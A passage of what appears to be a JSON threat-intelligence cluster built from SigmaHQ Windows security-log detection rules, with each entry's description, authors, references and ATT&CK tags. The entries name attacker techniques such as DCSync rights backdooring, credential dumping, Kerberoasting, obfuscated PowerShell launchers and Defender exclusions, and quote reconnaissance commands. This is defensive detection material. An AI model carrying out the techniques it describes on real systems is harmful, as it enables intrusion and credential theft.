"7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "value": "Possible Remote Password Change Through SAMR" + }, + { + "description": "Detection of logins performed with WMI", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/04", + "falsepositive": [ + "Monitoring tools", + "Legitimate system administration" + ], + "filename": "win_security_susp_wmi_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", + "value": "Login with WMI" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_chafer_mar18_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "value": "Chafer Activity - Security" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "value": "Invoke-Obfuscation STDIN+ Launcher - Security" + }, + { + "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Software uninstallation", + "Files restore activities" + ], + "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", + "value": "Suspicious Multiple File Rename Or Delete Occurred" + }, + { + "description": "This rule tries to detect token impersonation and theft. 
(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "meta": { + "author": "Michaela Adams, Zach Mathis", + "creation_date": "2022/11/06", + "falsepositive": [ + "Anti-Virus" + ], + "filename": "win_security_access_token_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://attack.mitre.org/techniques/T1134/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.001" + ] + }, + "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "value": "Access Token Abuse" + }, + { + "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. 
This could be a sign of tampered binaries.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Disk device errors" + ], + "filename": "win_security_susp_codeintegrity_check_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "value": "Failed Code Integrity Checks" + }, + { + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "meta": { + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "creation_date": "2019/04/03", + "falsepositive": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ ], + "filename": "win_security_account_backdoor_dcsync_rights.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1111556090137903104", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", + "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "win_security_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ] + }, + "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "value": "Suspicious Outbound Kerberos Connection - Security" + }, + { + "description": "Detects suspicious processes logging on with explicit credentials", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators that use the RunAS command or scheduled tasks" + ], + "filename": "win_security_susp_logon_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + 
"refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" + ], + "tags": [ + "attack.t1078", + "attack.lateral_movement" + ] + }, + "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "value": "Suspicious Remote Logon with Explicit Credentials" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "value": "Invoke-Obfuscation CLIP+ Launcher - Security" + }, + { + "description": "Detects a source system failing to authenticate against a remote host with multiple users.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_remote_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", + "value": "Multiple Users Remotely Failing To Authenticate From Single Source" + }, + { + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "meta": { + "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "creation_date": "2017/03/07", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_susp_net_recon_activity.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" + ] + }, + "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "value": "Reconnaissance Activity" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + 
}, + "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "value": "Invoke-Obfuscation Via Use Clip - Security" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "value": "Remote Task Creation via ATSVC Named Pipe" + }, + { + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_replay_attack_detected.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", + "value": "Replay Attack Detected" + }, + { + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "meta": { + 
"author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sysmon_channel_reference_deletion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "value": "Sysmon Channel Reference Deletion" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_security_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", + "value": "Credential Dumping Tools Service Execution - Security" + }, + { + "description": "Detects 
anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "value": "DPAPI Domain Master Key Backup Attempt" + }, + { + "description": "Detects non-system users failing to get a handle of the SCM database.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_handle_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1010" + ] + }, + "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "value": "SCM Database Handle Failure" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" + }, + { + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'" + }, + { + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/06", + "falsepositive": [ + "Read only access list authority" + ], + "filename": "win_security_net_share_obj_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "value": "Windows Network Access Suspicious desktop.ini Action" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_security_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", + "value": "Tap Driver Installation - Security" + }, + { + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on 
the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + ], + "filename": "win_security_petitpotam_susp_tgt_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", + "https://github.com/topotam/PetitPotam", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "value": "PetitPotam Suspicious Kerberos TGT Request" + }, + { + "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + 
"Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." + ], + "filename": "win_security_user_driver_loaded.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f63508a0-c809-4435-b3be-ed819394d612", + "value": "Suspicious Driver Loaded By User" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", + "value": "Invoke-Obfuscation VAR+ Launcher - Security" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": 
"win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2019/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_rottenpotato.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1195284233729777665", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "value": "RottenPotato Like Attack Pattern" + }, + { + "description": "Detects service ticket requests using RC4 encryption type", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/06", + "falsepositive": [ + "Service accounts used on legacy systems (e.g. 
NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "filename": "win_security_susp_rc4_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "value": "Suspicious Kerberos RC4 Ticket Encryption" + }, + { + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "SCCM" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "value": "Remote WMI ActiveScriptEventConsumers" + }, + { + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "meta": { + "author": "@BarryShooshooga", + "creation_date": "2019/10/26", + "falsepositive": [ + "Intended inclusions by administrator" + ], + "filename": "win_security_defender_bypass.yml", + 
"level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "value": "Windows Defender Exclusion Set" + }, + { + "description": "Detects known sensitive file extensions accessed on a network share", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "filename": "win_security_susp_raccess_sensitive_fext.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection", + "attack.t1039" + ] + }, + "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", + "value": "Suspicious Access to Sensitive File Extensions" + }, + { + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "meta": { + "author": "Keith Wright", + "creation_date": "2019/11/20", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_external_device.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" + ], + "tags": [ + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" 
+ ] + }, + "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "value": "External Disk Drive Or USB Storage Device" + }, + { + "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_add_remove_computer.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" + ], + "tags": "No established tags" + }, + "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "value": "Add or Remove Computer from DC" + }, + { + "description": "Detects non-system users performing privileged operation os the SCM database", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_privileged_operation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", + "value": "SCM Database Privileged Operation" + }, + { + "description": "Detects 
the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_local_anon_logon_created.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1189469425482829824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" + ] + }, + "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" + }, + { + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_delete.yml", + "level": "high", + "logsource.category": "No established category", + 